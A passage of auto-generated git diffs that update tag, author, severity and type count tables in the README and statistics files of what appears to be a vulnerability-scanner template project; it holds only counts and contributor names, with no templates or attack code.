| | | | | | +| cve2010 | 6 | randomrobbie | 2 | | | | | | | +| laravel | 6 | 0xcrypto | 2 | | | | | | | +| lucee | 5 | koti2 | 2 | | | | | | | +| netgear | 5 | bp0lr | 2 | | | | | | | +| files | 5 | moritz nentwig | 2 | | | | | | | +| iis | 5 | nkxxkn | 2 | | | | | | | +| java | 5 | davidmckennirey | 2 | | | | | | | +| fileupload | 5 | pxmme1337 | 2 | | | | | | | +| headless | 5 | ehsahil | 2 | | | | | | | +| confluence | 5 | gal nagli | 2 | | | | | | | +| wp-theme | 5 | incogbyte | 2 | | | | | | | +| ssti | 5 | alifathi-h1 | 2 | | | | | | | +| ibm | 5 | lotusdll | 2 | | | | | | | +| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | +| django | 5 | hahwul | 2 | | | | | | | +| circarlife | 5 | afaq | 2 | | | | | | | +| drupal | 5 | sushantkamble | 2 | | | | | | | +| dedecms | 5 | random-robbie | 2 | | | | | | | +| crlf | 4 | bing0o | 2 | | | | | | | +| artifactory | 4 | bsysop | 2 | | | | | | | +| elastic | 4 | dheerajmadhukar | 2 | | | | | | | +| solarwinds | 4 | ree4pwn | 2 | | | | | | | +| zimbra | 4 | kiblyn11 | 2 | | | | | | | +| windows | 4 | joeldeleep | 2 | | | | | | | +| deserialization | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| asp | 4 | 0xsapra | 2 | | | | | | | +| vpn | 4 | gevakun | 2 | | | | | | | +| webserver | 4 | hetroublemakr | 2 | | | | | | | +| traversal | 4 | smaranchand | 1 | | | | | | | +| tomcat | 4 | johnjhacking | 1 | | | | | | | +| nodejs | 4 | alph4byt3 | 1 | | | | | | | +| magmi | 4 | bolli95 | 1 | | | | | | | +| hongdian | 4 | kurohost | 1 | | | | | | | +| jolokia | 4 | omarkurt | 1 | | | | | | | +| docker | 4 | streetofhackerr007 | 1 | | | | | | | +| samsung | 4 | fmunozs | 1 | | | | | | | +| thinkcmf | 4 | soyelmago | 1 | | | | | | | +| moodle | 4 | 0h1in9e | 1 | | | | | | | +| thinkphp | 4 | mhdsamx | 1 | | | | | | | +| tikiwiki | 3 | rojanrijal | 1 | | | | | | | +| microstrategy | 3 | c3l3si4n | 1 | | | | | | | +| httpd | 3 | rodnt | 1 | | | | | | | +| terramaster | 3 | revblock | 1 | | | | | | | +| kubernetes | 3 | juicypotato1 | 1 | | | | | | | +| kevinlab | 3 | shifacyclewla | 1 | | | | | | | +| symfony | 3 | shelld3v | 1 | | | | | | | +| git | 3 | jeya seelan | 1 | | | | | | | +| mongodb | 3 | cookiehanhoan | 1 | | | | | | | +| r-seenet | 3 | hanlaomo | 1 | | | | | | | +| kafka | 3 | regala_ | 1 | | | | | | | +| ofbiz | 3 | luci | 1 | | | | | | | +| nacos | 3 | 0ut0fb4nd | 1 | | | | | | | +| printer | 3 | ipanda | 1 | | | | | | | +| itop | 3 | affix | 1 | | | | | | | +| opensis | 3 | bjhulst | 1 | | | | | | | +| hp | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| fanruan | 3 | sickwell | 1 | | | | | | | +| zabbix | 3 | _darrenmartyn | 1 | | | | | | | +| backups | 3 | tirtha_mandal | 1 | | | | | | | +| oa | 3 | ilovebinbash | 1 | | | | | | | +| log | 3 | schniggie | 1 | | | | | | | +| bitrix | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| targa | 3 | naglinagli | 1 | | | | | | | +| lfr | 3 | petruknisme | 1 | | | | | | | +| bypass | 3 | chron0x | 1 | | | | | | | +| amazon | 3 | sullo | 1 | | | | | | | +| ebs | 3 | micha3lb3n | 1 | | | | | | | +| wso2 | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| nosqli | 3 | notsoevilweasel | 1 | | | | | | | +| cve2008 | 3 | blckraven | 1 | | | | | | | +| resin | 3 | retr0 | 1 | | | | | | | +| grafana | 3 | pdp | 1 | | | | | | | +| fpd | 3 | luskabol | 1 | | | | | | | +| vbulletin | 3 | j33n1k4 | 1 | | | | | | | +| springcloud | 3 | thezakman | 1 | | | | | | | +| microsoft | 3 | b4uh0lz | 1 | | | | | | | +| openssh | 3 | noamrathaus | 1 | | | | | | | +| slack | 3 | absshax | 1 | | | | | | | +| ssh | 3 | d0rkerdevil | 1 | | | | | | | +| zhiyuan | 3 | alperenkesk | 1 | | | | | | | +| caucho | 3 | ratnadip gajbhiye | 1 | | | | | | | +| vrealize | 2 | 0xtavian | 1 | | | | | | | +| yapi | 2 | berkdusunur | 1 | | | | | | | +| prometheus | 2 | ahmed sherif | 1 | | | | | | | +| strapi | 2 | mah3sec_ | 1 | | | | | | | +| smb | 2 | @dwisiswant0 | 1 | | | | | | | +| telerik | 2 | un-fmunozs | 1 | | | | | | | +| github | 2 | divya_mudgal | 1 | | | | | | | +| webcam | 2 | remonsec | 1 | | | | | | | +| cve2005 | 2 | 0xrod | 1 | | | | | | | +| idrac | 2 | _c0wb0y_ | 1 | | | | | | | +| ecology | 2 | furkansenan | 1 | | | | | | | +| kentico | 2 | mass0ma | 1 | | | | | | | +| igs | 2 | daviey | 1 | | | | | | | +| linkerd | 2 | aceseven (digisec360) | 1 | | | | | | | +| xxljob | 2 | mohammedsaneem | 1 | | | | | | | +| status | 2 | akash.c | 1 | | | | | | | +| hjtcloud | 2 | akshansh | 1 | | | | | | | +| kibana | 2 | andysvints | 1 | | | | | | | +| huawei | 2 | jteles | 1 | | | | | | | +| activemq | 2 | sy3omda | 1 | | | | | | | +| saltstack | 2 | kba@sogeti_esec | 1 | | | | | | | +| oauth | 2 | @github.com/defr0ggy | 1 | | | | | | | +| ucmdb | 2 | nytr0gen | 1 | | | | | | | +| dolibarr | 2 | geraldino2 | 1 | | | | | | | +| frp | 2 | mubassirpatel | 1 | | | | | | | +| azure | 2 | raesene | 1 | | | | | | | +| spark | 2 | me9187 | 1 | | | | | | | +| leak | 2 | shreyapohekar | 1 | | | | | | | +| plesk | 2 | johnk3r | 1 | | | | | | | +| hpe | 2 | taielab | 1 | | | | | | | +| guacamole | 2 | patralos | 1 | | | | | | | +| odoo | 2 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| hasura | 2 | adrianmf | 1 | | | | | | | +| openam | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| couchdb | 2 | whynotke | 1 | | | | | | | +| showdoc | 2 | idealphase | 1 | | | | | | | +| wordfence | 2 | ajaysenr | 1 | | | | | | | +| sonicwall | 2 | gboddin | 1 | | | | | | | +| service | 2 | huowuzhao | 1 | | | | | | | +| chamilo | 2 | arcc | 1 | | | | | | | +| mail | 2 | pudsec | 1 | | | | | | | +| akamai | 2 | wabafet | 1 | | | | | | | +| emerge | 2 | ohlinge | 1 | | | | | | | +| sharepoint | 2 | yavolo | 1 | | | | | | | +| globalprotect | 2 | makyotox | 1 | | | | | | | +| jeedom | 2 | knassar702 | 1 | | | | | | | +| smtp | 2 | abison_binoy | 1 | | | | | | | +| grav | 2 | qlkwej | 1 | | | | | | | +| cve2007 | 2 | kabirsuda | 1 | | | | | | | +| jellyfin | 2 | undefl0w | 1 | | | | | | | +| shellshock | 2 | iampritam | 1 | | | | | | | +| waf | 2 | rtcms | 1 | | | | | | | +| rockethchat | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| nextjs | 2 | 52971 | 1 | | | | | | | +| cache | 2 | zhenwarx | 1 | | | | | | | +| fortios | 2 | sshell | 1 | | | | | | | +| icewarp | 2 | aresx | 1 | | | | | | | +| trixbox | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| openfire | 2 | co0nan | 1 | | | | | | | +| flir | 2 | udyz | 1 | | | | | | | +| rockmongo | 2 | its0x08 | 1 | | | | | | | +| voipmonitor | 2 | kareemse1im | 1 | | | | | | | +| jboss | 2 | 0xteles | 1 | | | | | | | +| mida | 2 | zandros0 | 1 | | | | | | | +| hashicorp | 2 | defr0ggy | 1 | | | | | | | +| proxy | 2 | elmahdi | 1 | | | | | | | +| phpcollab | 2 | ldionmarcil | 1 | | | | | | | +| akkadian | 2 | philippdelteil | 1 | | | | | | | +| backdoor | 2 | becivells | 1 | | | | | | | +| glassfish | 2 | pratik khalane | 1 | | | | | | | +| paloalto | 2 | yashanand155 | 1 | | | | | | | +| dos | 2 | elder tao | 1 | | | | | | | +| keycloak | 2 | andirrahmani1 | 1 | | | | | | | +| maian | 2 | willd96 | 1 | | | | | | | +| horde | 2 | vzamanillo | 1 | | | | | | | +| jsf | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| seeyon | 2 | b0yd | 1 | | | | | | | +| natshell | 2 | tim_koopmans | 1 | | | | | | | +| intrusive | 2 | manuelbua | 1 | | | | | | | +| sonarqube | 2 | th3.d1p4k | 1 | | | | | | | +| pega | 2 | bad5ect0r | 1 | | | | | | | +| injection | 2 | mesaglio | 1 | | | | | | | +| nexus | 2 | alex | 1 | | | | | | | +| splunk | 2 | yashgoti | 1 | | | | | | | +| avantfax | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| chiyu | 2 | flag007 | 1 | | | | | | | +| rstudio | 2 | sicksec | 1 | | | | | | | +| bigip | 2 | ooooooo_q | 1 | | | | | | | +| nagios | 2 | exploitation | 1 | | | | | | | +| dompdf | 1 | fopina | 1 | | | | | | | +| hadoop | 1 | s1r1u5_ | 1 | | | | | | | +| openx | 1 | deena | 1 | | | | | | | +| spring | 1 | toufik airane | 1 | | | | | | | +| circontrol | 1 | hakluke | 1 | | | | | | | +| pyramid | 1 | _harleo | 1 | | | | | | | +| axis | 1 | ringo | 1 | | | | | | | +| pacsone | 1 | apt-mirror | 1 | | | | | | | +| javamelody | 1 | bernardofsr | 1 | | | | | | | +| acme | 1 | r3naissance | 1 | | | | | | | +| ssltls | 1 | dogasantos | 1 | | | | | | | +| xvr | 1 | thevillagehacker | 1 | | | | | | | +| discourse | 1 | dawid czarnecki | 1 | | | | | | | +| exposures | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| prestashop | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 00acf3d125..144aaf2e68 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | -| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | -| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | -| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | -| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | -| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | -| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | -| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | -| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | -| tech | 97 | gaurang | 42 | workflows | 34 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | +| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | +| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | +| rce | 183 | geeknik | 127 | | | | | | | +| lfi | 168 | gy741 | 62 | | | | | | | +| cve2020 | 155 | madrobot | 60 | | | | | | | +| wp-plugin | 133 | princechaddha | 53 | | | | | | | +| tech | 100 | gaurang | 42 | | | | | | | From 870bffd42188f8364290a8c09b06041e24238a90 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 Aug 2021 19:23:29 +0000 Subject: [PATCH 1525/4083] Auto Update README [Mon Aug 9 19:23:29 UTC 2021] :robot: --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index d23fdee080..2401bea6cd 100644 --- a/README.md +++ b/README.md @@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | -| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | -| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | -| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | -| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | -| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | -| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | -| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | -| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | -| tech | 97 | gaurang | 42 | workflows | 34 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | +| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | +| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | +| rce | 183 | geeknik | 127 | | | | | | | +| lfi | 168 | gy741 | 62 | | | | | | | +| cve2020 | 155 | madrobot | 60 | | | | | | | +| wp-plugin | 133 | princechaddha | 53 | | | | | | | +| tech | 